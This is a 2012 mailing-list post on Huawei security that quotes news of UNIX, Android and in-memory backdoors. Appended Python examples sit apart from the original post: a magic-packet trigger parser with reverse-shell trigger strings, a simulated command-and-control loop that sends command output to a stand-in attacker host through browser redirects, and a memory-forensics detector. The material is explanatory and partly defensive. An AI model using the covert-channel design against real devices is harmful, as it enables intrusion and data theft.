[LINK] What's Behind the Huawei Fracas
stephen at melbpc.org.au
Wed Mar 28 16:27:33 EST 2012
> The real issue is whether Huawei technology brings with it embedded
> insecurity ... The probability of Huawei backbone devices being
> compromised is very high ..
Yes agreed. One might say it's certain Huawei equipment is compromised.
Given that even Unix and Android are targets, my concerns would be how
quickly might Huawei 'lose face' with patches compared with say Cisco?
With due respect, some cultures *will not* admit any internal problems.
Hacks are inevitable. Anyone know Huawei's response & patch-fix times?
For current hack examples:
1. A recent UNIX backdoor ..
"Trixd00r v0.0.1 - An Invisible TCP/IP based backdoor for UNIX systems"
NullSecurity Team releases "Trixd00r v0.0.1", an advanced and invisible
TCP/IP based userland backdoor for UNIX systems. It consists of a server
and a client. The server sits and waits for magic packets using a
sniffer. If a magic packet arrives, it will bind a shell over TCP or UDP
on the given port or connect back to the client, again over TCP or UDP.
The client is used to send magic packets to trigger the server and get a
shell. You can download and use trixd00r-0.0.1.tar.gz from NullSecurity.
2. A recent Android backdoor ..
"Backdoor in Android for No-Permissions Reverse Shell"
Security expert Thomas Cannon, working at viaForensics as Director of
R&D, has demonstrated a custom-developed app that installs a backdoor in
Android smartphones without requiring any permissions or exploiting any
Thomas built an app which requires no permissions and yet is able to give
an attacker a remote shell and allow them to execute commands on the
device remotely from anywhere in the world. The functionality they are
exploiting to do this is not new, it has been quietly pointed out for a
number of years, and was explained in depth at Defcon 18.
It is not a zero-day exploit or a root exploit. They are using Android
the way it was designed to work, but in a clever way in order to
establish a 2-way communication channel. This has been tested on Android
versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a
similar way on all platforms.
The application operates by instructing the browser to access a
particular web page with specific parameters. This web page, and the
server behind it, will, in turn, control the app by forwarding the
browser to a URL that starts with a protocol prefix that is registered as
being handled by the app, for example app://. This process can then be
repeated and in doing so it enables two-way communication.
"In this demonstration Android's power and flexibility were perhaps also
its downfall. Other smartphone platforms *may* not offer the controls we
are bypassing at all, and the multi-tasking capabilities in Android
allowed us to run the attack almost transparently to the user. This power
combined with the open nature of Android also facilitates the
customisation of the system to meet bespoke security requirements. This
is something we have even been involved in ourselves by implementing a
proof of concept Loadable Kernel Module to pro-actively monitor and
defend a client's intellectual property as it passed through their
devices. It is no surprise that we have seen adoption of Android research
projects in the military and government as it can be enhanced and adapted
for specific security requirements, perhaps like no other mobile platform
before it." Thomas Cannon said.
3. And here's a new one that sits in RAM not on a drive, so hard to find.
"Kaspersky finds malware that resides in your RAM"
Kaspersky Lab researchers have discovered a drive-by download attack that
evades hard-drive checkers by installing malware that lives in the
computer's memory. The 'fileless' bot is more difficult for antivirus
software to detect, and resides in memory until the machine is rebooted.
This malware, which creates no files on the affected systems, was dropped
on to the computers of visitors to popular news sites in Russia in a
drive-by download attack. Drive-by download attacks are one of the
primary methods of distributing malware over the web.
The attack code loaded an exploit for a Java vulnerability (CVE-2011-3544),
but it wasn't hosted on the affected websites themselves. Once the
malware infected a Windows machine, the bot disabled User Account
Control, contacted a command and control server and downloaded the 'Lurk'
Trojan. The malware also attacked Apple devices.
The Java exploit's payload consisted of a rogue DLL that was loaded and
attached on the fly to the legitimate Java process. Malware of this kind is
normally rare, because it dies when the system is rebooted and the memory is
cleared. But the hackers do not really care, because there is a good
chance that most victims will revisit the infected news websites. Once
the malicious DLL is loaded into memory, it sends data to and receives
instructions from a command and control server over HTTP.
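An added example for item 1 above (the trixd00r write-up). This is not NullSecurity's code and the magic-packet format, addresses and ports are constructed for the demo; it shows why a sniffer-triggered backdoor is invisible to a port scan or `netstat`: the server never listens, it just watches every packet for the trigger prefix, so the trigger can be sent to a port that is closed. The same parser serves the defender, who can sweep a capture for trigger packets and note that the hits land on ports with no listener.

```python
import socket
import struct

# Constructed trigger token for the demo. trixd00r's real magic-packet format
# is not described on the page; this value is an assumption.
MAGIC = b"\xde\xad\xbe\xef" + b"knock:"

def build_ipv4(src, dst, proto, l4):
    """Minimal IPv4 header in front of an L4 segment (checksums left zero; offline demo)."""
    total = 20 + len(l4)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + l4

def build_tcp(src, dst, sport, dport, payload):
    """IPv4+TCP packet with a 20-byte header (data offset 5), PSH|ACK flags."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x18, 8192, 0, 0)
    return build_ipv4(src, dst, 6, tcp + payload)

def build_udp(src, dst, sport, dport, payload):
    """IPv4+UDP packet; length field covers header plus payload."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    return build_ipv4(src, dst, 17, udp + payload)

def parse_packet(pkt):
    """Return (src, dst, proto, sport, dport, payload) or None if not IPv4 TCP/UDP."""
    if len(pkt) < 20:
        return None
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len > len(pkt):
        return None
    seg = pkt[ihl:total_len]
    if proto == 6 and len(seg) >= 20:
        sport, dport = struct.unpack("!HH", seg[:4])
        data = seg[(seg[12] >> 4) * 4:]          # skip TCP header incl. options
    elif proto == 17 and len(seg) >= 8:
        sport, dport = struct.unpack("!HH", seg[:4])
        data = seg[8:]
    else:
        return None
    return socket.inet_ntoa(src), socket.inet_ntoa(dst), proto, sport, dport, data

def trigger_for(pkt, magic=MAGIC):
    """The backdoor's sniffer logic: the destination port is irrelevant,
    only the magic prefix matters. Returns the requested shell mode or None."""
    p = parse_packet(pkt)
    if p is None or not p[5].startswith(magic):
        return None
    src, dst, proto, sport, dport, data = p
    return {"client": src, "dport": dport, "proto": "tcp" if proto == 6 else "udp",
            "mode": data[len(magic):].decode("ascii", "replace")}

def find_triggers(packets, open_ports, magic=MAGIC):
    """Defender side: sweep a capture (list of raw IPv4 packets) for trigger packets.
    A hit on a port nobody listens on is the tell: a clean host would only RST or
    ICMP-unreachable such a packet, never start a shell because of it."""
    hits = []
    for pkt in packets:
        t = trigger_for(pkt, magic)
        if t is not None:
            t["listener_present"] = t["dport"] in open_ports
            hits.append(t)
    return hits

if __name__ == "__main__":
    capture = [
        build_tcp("10.0.0.5", "10.0.0.9", 40000, 31337, MAGIC + b"bind:4444"),
        build_udp("10.0.0.5", "10.0.0.9", 40000, 53, MAGIC + b"reverse:10.0.0.5:4444"),
        build_tcp("10.0.0.7", "10.0.0.9", 50000, 22, b"SSH-2.0-OpenSSH_5.9\r\n"),
    ]
    for h in find_triggers(capture, open_ports={22, 80}):
        print(h)
```

The practical consequence is that port-based inventory (a scan, `ss -lnp`) cannot find this class of implant; what can is a look for raw/packet sockets and promiscuous interfaces on the host, or the network-side sweep above, which needs the trigger token and therefore a sample of the backdoor.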
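An added example for item 2 above (the viaForensics no-permissions reverse shell). This is not Thomas Cannon's app; it models in Python the message flow the write-up describes, with both sides of the exchange: the app asks the browser to open an attacker URL carrying the previous command's output, the server answers with a redirect to a custom `app://` URL, and because the app has registered that scheme the browser hands the URL back to it, closing the loop. The server name, the scheme name, the query parameter names and the canned command output are all assumptions made for the demo; a real implant would run the command string rather than look it up.

```python
import base64
from collections import deque
from urllib.parse import parse_qs, urlencode, urlsplit

C2 = "http://c2.example.invalid/poll"   # hypothetical attacker server
SCHEME = "app"                          # custom scheme the app registers an intent-filter for

def b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode()

def unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text)

class C2Server:
    """Attacker side. Takes exfiltrated output from the query string and answers
    with an HTTP 302 whose Location is an app:// URL carrying the next command."""
    def __init__(self, commands):
        self.queue = deque(commands)
        self.received = []

    def handle(self, url):
        q = parse_qs(urlsplit(url).query)
        if "d" in q:
            self.received.append(unb64(q["d"][0]).decode())
        if not self.queue:
            return 200, None                      # nothing more to do: plain page
        cmd = self.queue.popleft()
        return 302, f"{SCHEME}://cmd?{urlencode({'c': b64(cmd.encode())})}"

# Stand-in for command execution (constructed output); the real implant would
# run the string with the platform's exec facility. This keeps the demo harmless.
FAKE_SHELL = {
    "id": "uid=10042(u0_a42) gid=10042(u0_a42)",
    "getprop ro.build.version.release": "4.0.3",
}

def app_on_intent(uri):
    """Victim-side app: invoked because the browser was redirected to a URL whose
    scheme the app handles. Decodes the command, runs it, and asks the browser
    (ACTION_VIEW on Android) to open the C2 URL with the output attached."""
    parts = urlsplit(uri)
    if parts.scheme != SCHEME:
        return None
    cmd = unb64(parse_qs(parts.query)["c"][0]).decode()
    out = FAKE_SHELL.get(cmd, f"sh: {cmd}: not found")
    return f"{C2}?{urlencode({'d': b64(out.encode())})}"

def run_channel(commands):
    """Drive the loop: browser -> server -> redirect -> app -> browser ... until the
    server has no more commands. Returns what the server collected and each hop."""
    server = C2Server(commands)
    browser_url = C2                               # initial beacon, no data yet
    hops = []
    while True:
        status, location = server.handle(browser_url)
        hops.append((browser_url, status, location))
        if status != 302:
            break
        browser_url = app_on_intent(location)
    return server.received, hops

if __name__ == "__main__":
    received, hops = run_channel(["id", "getprop ro.build.version.release"])
    for hop in hops:
        print(hop)
    print("server received:", received)
```

Note what the loop does not need: no INTERNET permission (the browser does the network I/O), no exploit (scheme registration and opening URLs are documented platform behaviour), which is exactly why the write-up says the app requests no permissions. The observable artefacts are the browser's history and the repeated redirects to a scheme no web site has any business using.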
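An added example for item 3 above (the in-memory Lurk dropper). This is not Kaspersky's code. It shows the check a responder would run for a DLL that was "attached on the fly" to a process: walk the process's memory map looking for executable regions that have no backing file on disk and that start with a PE header. The memory-map records, the process name and the registry values are constructed sample data, shaped like what VirtualQueryEx or a memory-forensics tool reports; the paths are assumptions. It also covers the other indicator the page mentions, UAC being switched off.

```python
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Region:
    """One entry of a process's virtual memory map."""
    process: str
    pid: int
    base: int
    size: int
    protect: str                # e.g. "PAGE_EXECUTE_READWRITE"
    mapped_file: Optional[str]  # None for private (unbacked) memory
    head: bytes                 # first 64 bytes of the region

EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
              "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}

def looks_like_pe(head: bytes) -> bool:
    """'MZ' plus a plausible e_lfanew. A loader that scrubs the header defeats this,
    which is why the RWX heuristic below is kept as a second, noisier signal."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    return 0x40 <= e_lfanew < 0x1000

def find_unbacked_code(regions: List[Region]) -> List[dict]:
    """Flag executable memory with no file behind it. Image-backed regions are
    skipped here; for those, hash and verify the file on disk instead."""
    findings = []
    for r in regions:
        if r.protect not in EXECUTABLE or r.mapped_file is not None:
            continue
        if looks_like_pe(r.head):
            findings.append({"process": r.process, "pid": r.pid, "base": hex(r.base),
                             "confidence": "high",
                             "why": "PE image in memory with no backing file"})
        elif r.protect == "PAGE_EXECUTE_READWRITE":
            findings.append({"process": r.process, "pid": r.pid, "base": hex(r.base),
                             "confidence": "low",
                             "why": "private RWX region (JIT code caches look like this too)"})
    return findings

def uac_disabled(policies_system: dict) -> bool:
    """True if the values under HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\
    Policies\\System have EnableLUA set to 0, i.e. UAC switched off as the bot did."""
    return policies_system.get("EnableLUA", 1) == 0

def sample_regions() -> List[Region]:
    """Constructed java.exe map: the real jvm.dll (file-backed), the JIT code cache
    (private RWX, no PE header) and one injected DLL (private RWX, PE header)."""
    fake_pe = b"MZ" + b"\x00" * 0x3A + (0x80).to_bytes(4, "little")
    jit = bytes([0x55, 0x48, 0x89, 0xE5]) + b"\x90" * 60
    return [
        Region("java.exe", 4120, 0x6FE40000, 0x2B0000, "PAGE_EXECUTE_READ",
               r"C:\Program Files\Java\jre7\bin\client\jvm.dll", fake_pe),   # assumed path
        Region("java.exe", 4120, 0x02500000, 0x100000, "PAGE_EXECUTE_READWRITE", None, jit),
        Region("java.exe", 4120, 0x00D80000, 0x021000, "PAGE_EXECUTE_READWRITE", None, fake_pe),
        Region("java.exe", 4120, 0x00400000, 0x001000, "PAGE_READWRITE", None, fake_pe),
    ]

if __name__ == "__main__":
    for f in find_unbacked_code(sample_regions()):
        print(f)
    print("UAC disabled:", uac_disabled({"EnableLUA": 0, "ConsentPromptBehaviorAdmin": 5}))
```

The caveat matters for this particular case: Java's JIT keeps private RWX regions in java.exe all the time, so RWX alone is a weak signal there; the unbacked PE header is what separates the injected DLL from the code cache. Since the implant lives only in memory, this has to run on the live system or on a memory image taken before reboot, and the same reboot that "cleans" the machine also destroys the evidence.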
More information about the Link